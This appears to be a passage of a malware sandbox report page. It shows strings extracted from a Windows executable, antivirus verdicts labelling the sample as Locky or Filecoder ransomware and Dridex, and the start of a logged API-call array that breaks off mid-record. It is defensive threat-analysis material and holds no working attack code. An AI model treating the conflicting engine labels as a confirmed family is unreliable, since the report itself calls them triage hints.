<div>Wto=@&amp;C</div>
<div>t^9(uZ</div>
<div>tD9(u@</div>
<div>Y9&gt;t7j</div>
<div>0A@@Ju</div>
<div>YYu-9D$</div>
<div>_VVVVV</div>
<div>_VVVVV</div>
<div>zukSSS</div>
<div>0SSSSS</div>
<div>0SSSSS</div>
<div>0SSSSS</div>
<div>0WWWWW</div>
<div>BBFFf;</div>
<div>URPQQh@</div>
<div>v$;5d&amp;C</div>
<div>C PjPV</div>
<div>C$PjQV</div>
<div>C*PjTV</div>
<div>C+PjUV</div>
<div>C,PjVV</div>
<div>C-PjWV</div>
<div>C.PjRV</div>
<div>C/PjSV</div>
<div>.;1s(N</div>
<div>HHt4HHt</div>
<div>Ht`Ht,</div>
<div>teHtFHt&amp;Hu</div>
<div>ty&lt;%tA</div>
<div>PPPPPPPP</div>
<div>u|Vj@h</div>
<div>t.8t*W</div>
<div>PPPPPPPP</div>
<div>u,VVWV</div>
<div>JJt&amp;JJt</div>
<div>&lt;0|&lt;9</div>
<div>tK&lt;_t&lt;&lt;$t8&lt;&lt;t4&lt;&gt;t0&lt;-t,&lt;a|</div>
<div>&lt;z~$&lt;A|</div>
<div>&lt;0|I&lt;9</div>
<div>t^&lt;A|f&lt;P</div>
<div>WQt)9E</div>
<div>tP&lt;@tF&lt;Zt</div>
<div>th&lt;@tdj&#39;</div>
<div>EhPWje</div>
<div>Nt@Nt NuM</div>
<div>!Mh!MXV3</div>
<div>!MX8]x</div>
<div>j@h$3C</div>
<div>t.&lt;@t5V</div>
<div>TtSHtIHt?Ht</div>
<div>bj@h$3C</div>
<div>AtIHt0Hu</div>
<div>t}&lt;?tH&lt;Xt</div>
<div>^SSSSS</div>
<div>^SSSSS</div>
<div>0WhD3C</div>
<div>&gt;:u8FV</div>
<div>.VVVVVSRSSj</div>
<div>VVVVVj</div>
<div>^SSSSS</div>
<div>^SSSSS</div>
<div>0SSSSS</div>
<div>t+WWVPV</div>
<div>^SSSSS</div>
<div>^WWWWW</div>
<div>0SSSSS</div>
<div>8VVVVV</div>
<div>tb9} u</div>
<div>YYt\VV</div>
<div>YYt SVW</div>
<!-- NOTE(review): the next four strings (a smart-card API DLL name, one of its export names and two status messages) are the only ones in this list that do not look like C runtime text. No matching import section is visible in this part of the report, so whether the sample ever resolves or calls them is unconfirmed; they are more useful as hunting pivots combined with other indicators than as evidence on their own. -->
<div>SR_Close - begin Critical Section failed</div>
<div>winscard.dll</div>
<div>SCardIntroduceReaderW</div>
<div>CRAD_STATE_DISCONNECTED</div>
<!-- From here: C runtime error text, locale and date tables, and API / DLL names (EncodePointer, FlsAlloc, CorExitProcess, MessageBoxA and so on) that the Visual C++ runtime normally looks up dynamically. -->
<div>bad allocation</div>
<div>bad exception</div>
<div>EncodePointer</div>
<div>KERNEL32.DLL</div>
<div>DecodePointer</div>
<div>FlsFree</div>
<div>FlsSetValue</div>
<div>FlsGetValue</div>
<div>FlsAlloc</div>
<div>CorExitProcess</div>
<div>mscoree.dll</div>
<div>runtime error </div>
<div>TLOSS error</div>
<div>SING error</div>
<div>DOMAIN error</div>
<div>An application has made an attempt to load the C runtime library incorrectly.</div>
<div>Please contact the application&#39;s support team for more information.</div>
<div>- Attempt to use MSIL code from this assembly during native code initialization</div>
<div>This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.</div>
<div>- not enough space for locale information</div>
<div>- Attempt to initialize the CRT more than once.</div>
<div>This indicates a bug in your application.</div>
<div>- CRT not initialized</div>
<div>- unable to initialize heap</div>
<div>- not enough space for lowio initialization</div>
<div>- not enough space for stdio initialization</div>
<div>- pure virtual function call</div>
<div>- not enough space for _onexit/atexit table</div>
<div>- unable to open console device</div>
<div>- unexpected heap error</div>
<div>- unexpected multithread lock error</div>
<div>- not enough space for thread data</div>
<div>This application has requested the Runtime to terminate it in an unusual way.</div>
<div>Please contact the application&#39;s support team for more information.</div>
<div>- not enough space for environment</div>
<div>- not enough space for arguments</div>
<div>- floating point not loaded</div>
<div>Microsoft Visual C++ Runtime Library</div>
<div>&lt;program name unknown&gt;</div>
<div>Runtime Error!</div>
<div>Program: </div>
<div>Unknown exception</div>
<div>LC_TIME</div>
<div>LC_NUMERIC</div>
<div>LC_MONETARY</div>
<div>LC_CTYPE</div>
<div>LC_COLLATE</div>
<div>LC_ALL</div>
<div> !&quot;#$%&amp;&#39;()*+,-./0123456789:;&lt;=&gt;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~</div>
<div>SystemFunction036</div>
<div>ADVAPI32.DLL</div>
<div>InitializeCriticalSectionAndSpinCount</div>
<div>kernel32.dll</div>
<div>GetProcessWindowStation</div>
<div>GetUserObjectInformationA</div>
<div>GetLastActivePopup</div>
<div>GetActiveWindow</div>
<div>MessageBoxA</div>
<div>USER32.DLL</div>
<div> !&quot;#$%&amp;&#39;()*+,-./0123456789:;&lt;=&gt;?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~</div>
<div> !&quot;#$%&amp;&#39;()*+,-./0123456789:;&lt;=&gt;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~</div>
<div>HH:mm:ss</div>
<div>dddd, MMMM dd, yyyy</div>
<div>MM/dd/yy</div>
<div>December</div>
<div>November</div>
<div>October</div>
<div>September</div>
<div>August</div>
<div>February</div>
<div>January</div>
<div>Saturday</div>
<div>Friday</div>
<div>Thursday</div>
<div>Wednesday</div>
<div>Tuesday</div>
<div>Monday</div>
<div>Sunday</div>
<div>united-states</div>
<div>united-kingdom</div>
<div>trinidad &amp; tobago</div>
<div>south-korea</div>
<div>south-africa</div>
<div>south korea</div>
<div>south africa</div>
<div>slovak</div>
<div>puerto-rico</div>
<div>pr-china</div>
<div>pr china</div>
<div>new-zealand</div>
<div>hong-kong</div>
<div>holland</div>
<div>great britain</div>
<div>england</div>
<div>britain</div>
<div>america</div>
<div>swedish-finland</div>
<div>spanish-venezuela</div>
<div>spanish-uruguay</div>
<div>spanish-puerto rico</div>
<div>spanish-peru</div>
<div>spanish-paraguay</div>
<div>spanish-panama</div>
<div>spanish-nicaragua</div>
<div>spanish-modern</div>
<div>spanish-mexican</div>
<div>spanish-honduras</div>
<div>spanish-guatemala</div>
<div>spanish-el salvador</div>
<div>spanish-ecuador</div>
<div>spanish-dominican republic</div>
<div>spanish-costa rica</div>
<div>spanish-colombia</div>
<div>spanish-chile</div>
<div>spanish-bolivia</div>
<div>spanish-argentina</div>
<div>portuguese-brazilian</div>
<div>norwegian-nynorsk</div>
<div>norwegian-bokmal</div>
<div>norwegian</div>
<div>italian-swiss</div>
<div>irish-english</div>
<div>german-swiss</div>
<div>german-luxembourg</div>
<div>german-lichtenstein</div>
<div>german-austrian</div>
<div>french-swiss</div>
<div>french-luxembourg</div>
<div>french-canadian</div>
<div>french-belgian</div>
<div>english-usa</div>
<div>english-us</div>
<div>english-uk</div>
<div>english-trinidad y tobago</div>
<div>english-south africa</div>
<div>english-nz</div>
<div>english-jamaica</div>
<div>english-ire</div>
<div>english-caribbean</div>
<div>english-can</div>
<div>english-belize</div>
<div>english-aus</div>
<div>english-american</div>
<div>dutch-belgian</div>
<div>chinese-traditional</div>
<div>chinese-singapore</div>
<div>chinese-simplified</div>
<div>chinese-hongkong</div>
<div>chinese</div>
<div>canadian</div>
<div>belgian</div>
<div>australian</div>
<div>american-english</div>
<div>american english</div>
<div>american</div>
<div>Norwegian-Nynorsk</div>
<!-- The fragments below look like the text tables of the runtime's C++ symbol undecorator and RTTI support. -->
<div> Complete Object Locator&#39;</div>
<div> Class Hierarchy Descriptor&#39;</div>
<div> Base Class Array&#39;</div>
<div> Base Class Descriptor at (</div>
<div> Type Descriptor&#39;</div>
<div>`local static thread guard&#39;</div>
<div>`managed vector copy constructor iterator&#39;</div>
<div>`vector vbase copy constructor iterator&#39;</div>
<div>`vector copy constructor iterator&#39;</div>
<div>`dynamic atexit destructor for &#39;</div>
<div>`dynamic initializer for &#39;</div>
<div>`eh vector vbase copy constructor iterator&#39;</div>
<div>`eh vector copy constructor iterator&#39;</div>
<div>`managed vector destructor iterator&#39;</div>
<div>`managed vector constructor iterator&#39;</div>
<div>`placement delete[] closure&#39;</div>
<div>`placement delete closure&#39;</div>
<div>`omni callsig&#39;</div>
<div> delete[]</div>
<div> new[]</div>
<div>`local vftable constructor closure&#39;</div>
<div>`local vftable&#39;</div>
<div>`udt returning&#39;</div>
<div>`copy constructor closure&#39;</div>
<div>`eh vector vbase constructor iterator&#39;</div>
<div>`eh vector destructor iterator&#39;</div>
<div>`eh vector constructor iterator&#39;</div>
<div>`virtual displacement map&#39;</div>
<div>`vector vbase constructor iterator&#39;</div>
<div>`vector destructor iterator&#39;</div>
<div>`vector constructor iterator&#39;</div>
<div>`scalar deleting destructor&#39;</div>
<div>`default constructor closure&#39;</div>
<div>`vector deleting destructor&#39;</div>
<div>`vbase destructor&#39;</div>
<div>`string&#39;</div>
<div>`local static guard&#39;</div>
<div>`typeof&#39;</div>
<div>`vcall&#39;</div>
<div>`vbtable&#39;</div>
<div>`vftable&#39;</div>
<div>operator</div>
<div> delete</div>
<div>__unaligned</div>
<div>__restrict</div>
<div>__ptr64</div>
<div>__clrcall</div>
<div>__fastcall</div>
<div>__thiscall</div>
<div>__stdcall</div>
<div>__pascal</div>
<div>__cdecl</div>
<div>__based(</div>
<div>{flat}</div>
<div>`non-type-template-parameter</div>
<div>unsigned </div>
<div>short </div>
<div>&lt;ellipsis&gt;</div>
<div>,&lt;ellipsis&gt;</div>
<div> throw(</div>
<div>`template-parameter</div>
<div>cli::pin_ptr&lt;</div>
<div>cli::array&lt;</div>
<div>`anonymous namespace&#39;</div>
<div>generic-type-</div>
<div>template-parameter-</div>
<div>`unknown ecsu&#39;</div>
<div>union </div>
<div>struct </div>
<div>class </div>
<div>coclass </div>
<div>cointerface </div>
<div>extern &quot;C&quot; </div>
<div>[thunk]:</div>
<div>public: </div>
<div>protected: </div>
<div>private: </div>
<div>virtual </div>
<div>static </div>
<div>`template static data member destructor helper&#39;</div>
<div>`template static data member constructor helper&#39;</div>
<div>`local static destructor helper&#39;</div>
<div>`adjustor{</div>
<div>`vtordisp{</div>
<div>`vtordispex{</div>
<div>const </div>
<div>volatile </div>
<div>volatile</div>
<div> volatile</div>
<div>signed </div>
<div>double</div>
<div>wchar_t</div>
<div>UNKNOWN</div>
<div>__int128</div>
<div>__int32</div>
<div>__int64</div>
<div>__int16</div>
<div>__w64 </div>
<div>__int8</div>
<div>SunMonTueWedThuFriSat</div>
<div>JanFebMarAprMayJunJulAugSepOctNovDec</div>
<!-- Imported function names followed by their DLL name (USER32.dll, KERNEL32.dll); they repeat the names shown in the report's import listings, as far as those listings are visible here. -->
<div>MessageBoxW</div>
<div>SetRect</div>
<div>SetCursor</div>
<div>ReleaseDC</div>
<div>IsChild</div>
<div>ChildWindowFromPoint</div>
<div>CreateWindowExA</div>
<div>ShowWindowAsync</div>
<div>LoadStringW</div>
<div>TranslateMessage</div>
<div>GetDlgItemInt</div>
<div>GetCursorPos</div>
<div>DrawFocusRect</div>
<div>GetDCEx</div>
<div>SetRectEmpty</div>
<div>SetMenuItemInfoW</div>
<div>LoadIconA</div>
<div>SendMessageA</div>
<div>GetWindowLongA</div>
<div>EmptyClipboard</div>
<div>SetWindowTextA</div>
<div>MapWindowPoints</div>
<div>GetFocus</div>
<div>BeginPaint</div>
<div>EnableMenuItem</div>
<div>UpdateWindow</div>
<div>SetParent</div>
<div>USER32.dll</div>
<div>GetEnvironmentStrings</div>
<div>GetCurrentThread</div>
<div>VirtualAlloc</div>
<div>GetVersionExA</div>
<div>GetProcAddress</div>
<div>LoadLibraryA</div>
<div>FreeLibrary</div>
<div>GetModuleFileNameA</div>
<div>lstrlenW</div>
<div>HeapAlloc</div>
<div>CloseHandle</div>
<div>MultiByteToWideChar</div>
<div>EnterCriticalSection</div>
<div>GetCurrentProcess</div>
<div>FindFirstFileW</div>
<div>GetStdHandle</div>
<div>CreateFileA</div>
<div>LocalFree</div>
<div>GetVersionExW</div>
<div>GetCommandLineW</div>
<div>CreateEventW</div>
<div>LeaveCriticalSection</div>
<div>HeapDestroy</div>
<div>TerminateProcess</div>
<div>KERNEL32.dll</div>
<div>RtlUnwind</div>
<div>HeapFree</div>
<div>GetProcessHeap</div>
<div>GetStartupInfoW</div>
<div>GetModuleHandleA</div>
<div>TlsGetValue</div>
<div>TlsAlloc</div>
<div>TlsSetValue</div>
<div>TlsFree</div>
<div>InterlockedIncrement</div>
<div>SetLastError</div>
<div>GetCurrentThreadId</div>
<div>GetLastError</div>
<div>InterlockedDecrement</div>
<div>ExitProcess</div>
<div>WriteFile</div>
<div>UnhandledExceptionFilter</div>
<div>GetModuleFileNameW</div>
<div>FreeEnvironmentStringsA</div>
<div>FreeEnvironmentStringsW</div>
<div>GetEnvironmentStringsW</div>
<div>GetCommandLineA</div>
<div>SetHandleCount</div>
<div>GetFileType</div>
<div>GetStartupInfoA</div>
<div>DeleteCriticalSection</div>
<div>HeapCreate</div>
<div>VirtualFree</div>
<div>QueryPerformanceCounter</div>
<div>GetTickCount</div>
<div>GetCurrentProcessId</div>
<div>GetSystemTimeAsFileTime</div>
<div>SetUnhandledExceptionFilter</div>
<div>RaiseException</div>
<div>IsDebuggerPresent</div>
<div>FatalAppExitA</div>
<div>GetCPInfo</div>
<div>GetACP</div>
<div>GetOEMCP</div>
<div>SetConsoleCtrlHandler</div>
<div>InterlockedExchange</div>
<div>InitializeCriticalSection</div>
<div>HeapReAlloc</div>
<div>GetTimeFormatA</div>
<div>GetDateFormatA</div>
<div>GetUserDefaultLCID</div>
<div>GetLocaleInfoA</div>
<div>EnumSystemLocalesA</div>
<div>IsValidLocale</div>
<div>IsValidCodePage</div>
<div>GetStringTypeA</div>
<div>GetStringTypeW</div>
<div>LCMapStringA</div>
<div>WideCharToMultiByte</div>
<div>LCMapStringW</div>
<div>HeapSize</div>
<div>GetLocaleInfoW</div>
<div>GetTimeZoneInformation</div>
<div>CompareStringA</div>
<div>CompareStringW</div>
<div>SetEnvironmentVariableA</div>
<div>Qx/y|:[</div>
<div>ko&quot;FVi1</div>
<div>qe$FVi1</div>
<div>gdl+Fus$</div>
<!-- Decorated class names in the form MSVC uses for RTTI type descriptors; the ones listed are standard library and runtime classes. -->
<div>.?AVbad_exception@std@@</div>
<div>.?AVexception@std@@</div>
<div>.?AVbad_cast@std@@</div>
<div>.?AVbad_typeid@std@@</div>
<div>.?AV__non_rtti_object@std@@</div>
<div>.?AVtype_info@@</div>
<div> </div>
<div>abcdefghijklmnopqrstuvwxyz</div>
<div>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div>
<div> </div>
<div>abcdefghijklmnopqrstuvwxyz</div>
<div>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div>
<div>.?AVDNameNode@@</div>
<div>.?AVcharNode@@</div>
<div>.?AVpDNameNode@@</div>
<div>.?AVDNameStatusNode@@</div>
<div>.?AVpcharNode@@</div>
<div> ((((( H</div>
<div> h(((( H</div>
<div> H</div>
</div>
</section>
</div>
<div class="tab-pane fade" id="static_antivirus_tab">
<section id="static_antivirus">
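<!--
  Antivirus verdicts for the analysed sample, one row per engine. "Clean" (class="muted") means that engine
  reported no signature; it is not a statement that the file is benign. Detections use class="text-error".
  NOTE(review): 20 of the 54 engines listed report a detection. The labels disagree on family (Locky / Filecoder
  ransomware, Dridex, Reconyc) and several are generic or heuristic names (Artemis, Malware-gen, HEUR, Generic),
  so treat them as triage hints and confirm the family from the behavioural analysis.
  Markup: header cells carry scope="col" and the rows are split into thead / tbody so assistive technology can
  associate each verdict with its column.
-->
<table class="table table-striped table-bordered">
  <caption>Antivirus engine results for the analysed sample</caption>
  <thead>
    <tr>
      <th scope="col">Antivirus</th>
      <th scope="col">Signature</th>
    </tr>
  </thead>
  <tbody>
    <tr><td>Bkav</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>MicroWorld-eScan</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>nProtect</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>CMC</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>CAT-QuickHeal</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>McAfee</td><td><span class="text-error">Artemis!E1A9B6F7285A</span></td></tr>
    <tr><td>Malwarebytes</td><td><span class="text-error">Ransom.Locky</span></td></tr>
    <tr><td>Zillya</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>AegisLab</td><td><span class="text-error">Troj.W32.Reconyc!c</span></td></tr>
    <tr><td>TheHacker</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>Alibaba</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>K7GW</td><td><span class="text-error">Trojan ( 004de6971 )</span></td></tr>
    <tr><td>K7AntiVirus</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>NANO-Antivirus</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>F-Prot</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>Symantec</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>ESET-NOD32</td><td><span class="text-error">Win32/Filecoder.NFX</span></td></tr>
    <tr><td>TrendMicro-HouseCall</td><td><span class="text-error">TSPY_DRIDEX.YYSRF</span></td></tr>
    <tr><td>Avast</td><td><span class="text-error">Win32:Malware-gen</span></td></tr>
    <tr><td>ClamAV</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>GData</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>Kaspersky</td><td><span class="text-error">Trojan.Win32.Reconyc.ffkp</span></td></tr>
    <tr><td>BitDefender</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>Agnitum</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>SUPERAntiSpyware</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>ByteHero</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>Rising</td><td><span class="text-error">PE:Malware.Generic/QRS!1.9E2D [F]</span></td></tr>
    <tr><td>Ad-Aware</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>Emsisoft</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>Comodo</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>F-Secure</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>DrWeb</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>VIPRE</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>TrendMicro</td><td><span class="text-error">TSPY_DRIDEX.YYSRF</span></td></tr>
    <tr><td>McAfee-GW-Edition</td><td><span class="text-error">Artemis!Trojan</span></td></tr>
    <tr><td>Sophos</td><td><span class="text-error">Troj/Ransom-CGX</span></td></tr>
    <tr><td>Cyren</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>Jiangmin</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>Avira</td><td><span class="text-error">TR/Crypt.EPACK.24719</span></td></tr>
    <tr><td>Antiy-AVL</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>Arcabit</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>ViRobot</td><td><span class="text-error">Trojan.Win32.Locky-Ransom.208896[h]</span></td></tr>
    <tr><td>Microsoft</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>AhnLab-V3</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>ALYac</td><td><span class="text-error">Trojan.Ransom.LockyCrypt</span></td></tr>
    <tr><td>VBA32</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>Panda</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>Zoner</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>Tencent</td><td><span class="text-error">Win32.Trojan.Gen.Qbza</span></td></tr>
    <tr><td>Ikarus</td><td><span class="text-error">Trojan.Win32.Filecoder</span></td></tr>
    <tr><td>Fortinet</td><td><span class="text-error">W32/Kryptik.EODW!tr</span></td></tr>
    <tr><td>AVG</td><td><span class="text-error">Generic_r.HMH</span></td></tr>
    <tr><td>Baidu-International</td><td><span class="muted">Clean</span></td></tr>
    <tr><td>Qihoo-360</td><td><span class="text-error">HEUR/QVM09.0.Malware.Gen</span></td></tr>
  </tbody>
</table>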
</section>
</div>
</div>
</div>
</div>
<div class="tab-pane fade" id="behavior">
<!-- Behavior tab: two placeholder containers for the process graphs. In the markup they
     hold only a noscript fallback; presumably the page's graph script fills them from
     the graph_raw_data array defined in the inline script that follows (the rendering
     code is not visible in this part of the page; confirm). -->
<!-- NOTE(review): graph_raw_data is emitted as an inline script literal and carries
     values taken from the analysed sample (process names, API call names). Confirm the
     server serialises it with script-context escaping, so that a sample-chosen string
     such as a process name cannot close the script element or inject markup. -->
<div id="graph_process_overview"><noscript>requires javascript to run</noscript></div>
<div id="graph_process_details"><noscript>requires javascript to run</noscript></div>
<!-- Graph axis controls. Both anchors have no href and show the placeholder text
     "loading"; presumably a script replaces the text and attaches the handlers by id. -->
<div id="buttons">
<ul>
<li>X-axis by: <a id="graph_controls_event">loading</a></li>
<li>Y-axis by: <a id="graph_controls_grouping">loading</a></li>
</ul>
</div>
<script type="text/javascript">
var graph_raw_data = [{"parent_id": 1796, "process_name": "65fg67n.exe", "process_id": 1592, "first_seen": "2016-02-16 17:41:35,173", "calls": [{"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", 
"api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, 
{"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetDllHandle"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,183", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "misc", "timestamp": "2016-02-16 17:41:35,193", "api": "GetSystemMetrics"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": 
"2016-02-16 17:41:35,193", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrLoadDll"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "system", "timestamp": "2016-02-16 17:41:35,193", "api": "LdrGetProcedureAddress"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,193", "api": "RegOpenKeyExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,193", "api": "RegQueryValueExA"}, {"category": "registry", "timestamp": "2016-02-16 17:41:35,193", "api": "RegCloseKey"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,193", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:35,193", "api": "NtQueryInformationFile"}, {"category": "system", "timestamp": 
